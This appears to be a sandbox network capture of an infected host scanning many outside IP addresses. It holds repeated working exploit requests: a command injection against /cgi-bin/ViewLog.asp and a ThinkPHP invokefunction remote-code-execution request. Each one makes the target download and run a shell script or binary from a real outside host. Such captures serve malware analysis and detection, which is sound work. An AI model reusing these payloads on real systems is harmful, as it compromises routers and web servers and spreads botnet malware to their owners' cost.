Nov 22, 2023 08:39:12.992592096 CET	10114	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:16.231930017 CET	10475	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:22.374973059 CET	11290	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.405253887 CET	12664	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721837997 CET	15621	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:47.867249012 CET	19770	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
518	192.168.2.23	36834	31.136.238.56	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:12.993257999 CET	10115	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:16.231930017 CET	10476	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:22.374973059 CET	11290	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:34.405253887 CET	12664	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:58.721837997 CET	15621	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:47.867160082 CET	19770	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
519	192.168.2.23	46234	62.80.167.178	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.019155979 CET	10118	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
520	192.168.2.23	37150	95.9.212.172	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.059257030 CET	10118	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
521	192.168.2.23	37542	31.136.237.77	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.176243067 CET	10122	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:13.736279011 CET	10236	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:14.856031895 CET	10358	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:17.255861998 CET	10601	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.863142014 CET	11185	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:30.821814060 CET	12265	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:50.530981064 CET	14660	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:27.389925003 CET	19072	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
522	192.168.2.23	51722	31.220.72.85	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.182964087 CET	10124	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
523	192.168.2.23	33422	112.126.161.42	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.449028969 CET	10229	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:13.769783974 CET	10237	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:44 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
524	192.168.2.23	32998	95.250.107.55	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.989294052 CET	10239	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
525	192.168.2.23	33586	95.100.207.31	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:13.994518042 CET	10240	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:14.701088905 CET	10355	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:14.941582918 CET	10361	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:14 GMT Date: Wed, 22 Nov 2023 07:39:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 31 34 35 31 39 64 34 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 34 26 23 34 36 3b 34 31 66 34 62 32 38 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.a14519d4.1700638754.41f4b289</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
526	192.168.2.23	33380	95.86.66.99	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:14.001801014 CET	10240	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
527	192.168.2.23	41666	95.183.8.43	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:14.126023054 CET	10241	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:14.486098051 CET	10347	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:14 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
528	192.168.2.23	48184	88.221.158.2	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:14.652863979 CET	10352	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:14.811393023 CET	10356	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:39:14 GMT Date: Wed, 22 Nov 2023 07:39:14 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 37 34 64 64 62 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 34 26 23 34 36 3b 31 65 36 35 65 66 33 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.974ddb17.1700638754.1e65ef33</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
529	192.168.2.23	54260	88.221.178.179	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:14.666558981 CET	10353	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
